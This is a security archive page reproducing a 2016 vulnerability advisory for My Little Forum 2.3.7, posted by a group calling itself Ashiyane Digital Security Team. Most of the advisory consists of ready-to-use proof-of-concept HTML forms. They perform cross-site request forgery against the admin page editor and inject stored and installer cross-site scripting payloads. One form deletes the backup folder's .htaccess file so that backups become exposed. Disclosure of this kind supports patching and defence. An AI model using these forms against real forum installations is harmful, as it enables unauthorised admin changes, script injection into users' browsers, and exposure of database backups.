My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting: Posted Nov 1, 2016; Authored by Ashiyane Digital Security Team; My Little Forum version 2.3.7 suffers from backup disclosure, cross site request forgery, and multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | a59ee3903fda11c485d0df52fb168d32bef192bfabf5d14bf386c76c4cb86a02; Download | Favorite | View

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

Title:
======
My Little Forum  2.3.7 - Multiple Vulnerability


Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that 
displays the messages in classical threaded view (tree structure). It is 
Open Source licensed under the GNU General Public License. The main 
claim of this web forum is simplicity. Furthermore it should be easy to 
install and run on a standard server configuration with PHP and MySQL.


Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip


Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allow To Backup Disclosure


Vulnerability Details:
==============================
This WebApplication is vulnerable and suffer from some vulnerablity.


Severity Level:
===============
High


Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit can add page in webapp.
<form 
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Title">
<input type="hidden" name="content" value="Content">
<input type="hidden" name="menu_linkname" value="Name">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>


2. Stored XSS:
<form 
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Stored XSS 
<script>alert(1)</script>">
<input type="hidden" name="content" value="Stored XSS 
<script>alert(2)</script>">
<input type="hidden" name="menu_linkname" value="Stored XSS 
<script>alert(3)</script>">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>

3. Backup Disclosure:
with this exploit we can delect htaccess in backup folder for access to 
backups.
<form action="http://localhost/mylittleforum-master/index.php" 
method="post" accept-charset="utf-8">
<div>
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="delete_backup_files[]" value=".htaccess">
<input type="submit" name="delete_backup_files_confirm" value="OK - Delete">
</div>
</form>
Next use exploit go to:
http://localhost/mylittleforum-master/backup/



Author:
==================
Ashiyane Digital Security Team


=======================

Title:
======
My Little Forum  2.3.7 (Installer) - Cross-Site Scripting


Product & Service Introduction:
===============================
My little forum is a simple PHP and 
MySQL based internet forum that displays the messages in classical threaded view 
(tree structure). It is Open Source licensed under the GNU General 
Public License. The main claim of this web forum is simplicity. 
Furthermore it should be easy to install and 
run on a standard server configuration with PHP and MySQL.


Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip


Vulnerability Type:
=========================
Cross-Site Scripting


Vulnerability Details:
==============================
Installer of My Little Forum is vulnerable to cross-site scripting.


Proof of Concept (PoC):
=======================
<html>
<body>
<form action="http://localhost/mylittleforum-master/install/index.php" 
method="post">
<input type="text" name="forum_name" value='"><script>alert(1)</script>'>
<input type="text" name="forum_address" value='"><script>alert(2)</script>'>
<input type="text" name="forum_email" value='"><script>alert(3)</script>'>
<input type="text" name="admin_name" value='"><script>alert(4)</script>'>
<input type="text" name="admin_email" value='"><script>alert(5)</script>'>
<input type="text" name="host" value='"><script>alert(6)</script>'>
<input type="text" name="database" value='"><script>alert(7)</script>'>
<input type="text" name="user" value='"><script>alert(8)</script>'>
<input type="text" name="table_prefix" value='"><script>alert(9)</script>'>
<input type="submit" name="install_submit" value="OK - Install forum">
<input type="hidden" name="language_file" value="english.lang">
</form>
</body>
</html>



Author:
==================
Ashiyane Digital Security Team ||

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

Share This

My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems